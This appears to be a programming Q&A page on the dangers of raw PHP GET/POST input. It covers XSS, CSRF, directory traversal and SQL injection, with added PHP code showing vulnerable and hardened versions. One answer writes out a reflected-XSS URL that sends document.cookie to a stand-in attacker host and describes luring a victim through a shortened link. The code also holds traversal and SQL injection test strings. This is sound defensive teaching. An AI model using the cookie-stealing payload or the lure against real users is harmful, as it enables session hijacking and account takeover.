I want to know what the vulnerabilities are when using the GET and POST variables directly, i.e. without trimming, the addslashes function, mysql escape string, or something like that.
My question is:
What more do we need to take care of while playing with GET and POST?
What kinds of attacks are there, like SQL injection?
Easiest possible XSS attack with a tiny bit of social engineering
Let's suppose you have a simple PHP application that uses sessions to track users, and it has some kind of admin interface where users with higher privileges can, let's say, edit content.
And let's suppose that you are logged in as an administrator on that site, and that inside that application there is a file request.php with the following piece of code:
And now somebody discovers this and constructs the following URL: http://yourapp/request.php?action=document.location.href='http://foreignsite?c='+document.cookie
Then that someone adds this URL to tinyurl.com, which shortens it to something like http://tinyurl.com/x44534, and then he sends you an e-mail stating "hey, look at this, you may find it useful".
You click the link, tinyurl.com translates the short URL back to the long one and redirects your browser to it, your request.php happily outputs the JavaScript from the query, your browser sees it and executes it, and as a result the person who runs http://foreignsite gets all your cookies.
Then he just needs to insert those cookie values into his browser, and voilà, he has instant access to your site's admin interface, because he got your session cookie.
This describes the simplest possible XSS attack; it is really simplistic and will probably not work in real life, but hopefully you got the basic idea of how it works.
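As an added example (not the answer's own request.php, which is not reproduced on the page), here is a minimal version that reflects the action parameter the way the answer describes, next to a hardened version. It assumes the value is echoed into the HTML body, so the answer's JavaScript is wrapped in a script tag; the function names and the HttpOnly session cookie setup are illustrative additions.

```php
<?php
// Added example, not the answer's own request.php (that snippet is not on the
// page). It assumes the "action" query parameter from the answer's URL is
// echoed into the HTML body, so the payload below wraps the answer's
// JavaScript in a <script> tag. Function names are illustrative.

declare(strict_types=1);

// Vulnerable: the raw parameter is concatenated into the response, so any
// markup in it becomes part of the page and runs with the victim's session.
function render_vulnerable(array $get): string
{
    $action = (string)($get['action'] ?? '');
    return '<p>Unknown action: ' . $action . '</p>';
}

// Hardened: encode for the HTML context at the point of output. ENT_QUOTES
// also neutralises ' and " so the same value is safe inside an attribute,
// and ENT_SUBSTITUTE keeps invalid UTF-8 from producing an empty string.
function render_safe(array $get): string
{
    $action = (string)($get['action'] ?? '');
    return '<p>Unknown action: '
        . htmlspecialchars($action, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8')
        . '</p>';
}

// Defence in depth: an HttpOnly session cookie is invisible to document.cookie,
// so the exfiltration in the answer fails even if an escape is missed.
// Both settings must be applied before session_start() (PHP 7.3+ array form).
function start_session_hardened(): void
{
    ini_set('session.cookie_httponly', '1');
    session_set_cookie_params([
        'httponly' => true,
        'samesite' => 'Lax',
        'secure'   => !empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off',
    ]);
    session_start();
}

// Constructed payload: the answer's JavaScript inside a script tag.
$payload = "<script>document.location.href='http://foreignsite?c='+document.cookie</script>";

// The first line contains a live <script> element; the second shows the same
// text with < > ' and " encoded, which the browser renders as literal text.
echo render_vulnerable(['action' => $payload]), PHP_EOL;
echo render_safe(['action' => $payload]), PHP_EOL;
```

The point of the hardened version is that the escaping happens at output time for the specific context (here the HTML body), rather than by trimming or addslashes on the way in; the HttpOnly cookie does not fix the injection but removes the cookie theft the answer describes as its payoff.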
Mainly CSRF, XSS and directory traversal:
http://en.wikipedia.org/wiki/Cross-site_request_forgery
http://en.wikipedia.org/wiki/Cross-site_scripting
http://en.wikipedia.org/wiki/Directory_traversal
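The following is an added example, not part of the answer above, that puts one concrete check beside each of the three attack classes it links to, plus a prepared statement for the SQL injection the question asks about. The users table, the documents directory, the function names and the sample rows are all assumed, and the database portion needs PHP's pdo_sqlite extension.

```php
<?php
// Added example, not from the answer above: one concrete check for each of the
// three attack classes it links to, plus a prepared statement for the SQL
// injection the question mentions. Function names, the users table, the
// documents directory and the sample rows are all assumed; the database part
// needs PHP's pdo_sqlite extension.

declare(strict_types=1);

// --- CSRF: a state-changing POST must carry a secret that only a page served
// by this site can know. An attacker's site can make the victim's browser
// send the request (with cookies) but cannot read the token to include it.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function csrf_check(array $post): bool
{
    $expected = (string)($_SESSION['csrf_token'] ?? '');
    $given    = (string)($post['csrf_token'] ?? '');
    // hash_equals() compares in constant time; an empty expectation is rejected.
    return $expected !== '' && hash_equals($expected, $given);
}

// --- Directory traversal: never build a filesystem path from a raw parameter.
// Returns the resolved path inside $base, or null if the name is rejected.
function safe_doc_path(string $base, string $name): ?string
{
    // Allow-list the shape first: no slashes, no dots except the extension, no NUL.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\.txt\z/', $name)) {
        return null;
    }
    $realBase = realpath($base);
    $real     = realpath($base . DIRECTORY_SEPARATOR . $name);
    if ($realBase === false || $real === false) {
        return null;   // base misconfigured or file does not exist
    }
    // Second line of defence: the resolved path must still start with $base.
    if (strpos($real, $realBase . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

// --- SQL injection: bind the value instead of escaping it into the query text.
function find_user(PDO $db, string $login): ?array
{
    $stmt = $db->prepare('SELECT id, login, role FROM users WHERE login = :login');
    $stmt->execute([':login' => $login]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// --- Demo on constructed data.
$_SESSION = [];                                     // stand-in for a started session
$token   = csrf_token();
$forged  = csrf_check(['csrf_token' => 'guess']);   // attacker cannot know $token
$genuine = csrf_check(['csrf_token' => $token]);

$docs = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'docs_' . bin2hex(random_bytes(4));
mkdir($docs);
file_put_contents($docs . DIRECTORY_SEPARATOR . 'readme.txt', 'hello');
$ok  = safe_doc_path($docs, 'readme.txt');          // resolved path inside $docs
$bad = safe_doc_path($docs, '../../etc/passwd');    // rejected by the allow-list

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT, role TEXT)');
$db->exec("INSERT INTO users (login, role) VALUES ('admin', 'admin'), ('bob', 'user')");
// With string concatenation this classic payload would match every row; as a
// bound parameter the quote is just data, so it matches no user at all.
$injected = find_user($db, "' OR '1'='1");
$admin    = find_user($db, 'admin');

var_dump($forged, $genuine, $ok, $bad, $injected, $admin);
```

Each check addresses a different failure: the CSRF token defeats a request the victim's own browser was tricked into sending, the allow-list plus realpath comparison keeps a file parameter inside the intended directory, and the bound parameter keeps user input out of the SQL grammar entirely, which is what addslashes and mysql escape string only approximate.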